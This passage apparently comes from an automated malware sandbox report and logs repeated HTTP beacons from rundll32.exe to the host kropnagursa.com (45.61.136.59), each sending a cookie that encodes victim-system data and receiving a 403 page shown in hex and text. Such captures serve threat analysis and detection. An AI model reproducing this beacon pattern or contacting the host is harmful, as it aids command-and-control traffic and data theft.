                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            225192.168.2.44992145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:14.154829025 CET2395OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:14.319607019 CET2395INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            226192.168.2.44992245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:14.864108086 CET2396OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:15.028935909 CET2397INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Feb 2, 2023 21:19:15.136579990 CET2397OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:15.301661968 CET2397INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            227192.168.2.44992345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:15.627276897 CET2398OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:15.795692921 CET2399INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            228192.168.2.44992445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:16.107753038 CET2399OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:16.272450924 CET2400INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            229192.168.2.44992545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:16.589262962 CET2401OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:16.757189035 CET2401INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            23192.168.2.44971945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:13.165718079 CET2137OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:13.330622911 CET2137INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            230192.168.2.44992645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:17.131511927 CET2402OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:17.300225019 CET2402INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            231192.168.2.44992745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:17.686743975 CET2403OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:17.851855993 CET2404INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            232192.168.2.44992845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:18.325995922 CET2405OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:18.494101048 CET2405INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:18 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            233192.168.2.44992945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:19.261794090 CET2406OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:19.429526091 CET2406INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            234192.168.2.44993045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:19.931093931 CET2407OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:20.098773003 CET2407INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            235192.168.2.44993145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:20.406650066 CET2408OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:20.571352959 CET2409INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            236192.168.2.44993245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:21.184225082 CET2410OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:21.349169016 CET2410INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:21 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            237192.168.2.44993345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:21.663435936 CET2411OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:21.838412046 CET2411INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:21 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            238192.168.2.44993445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:22.148663044 CET2412OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:22.316175938 CET2413INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
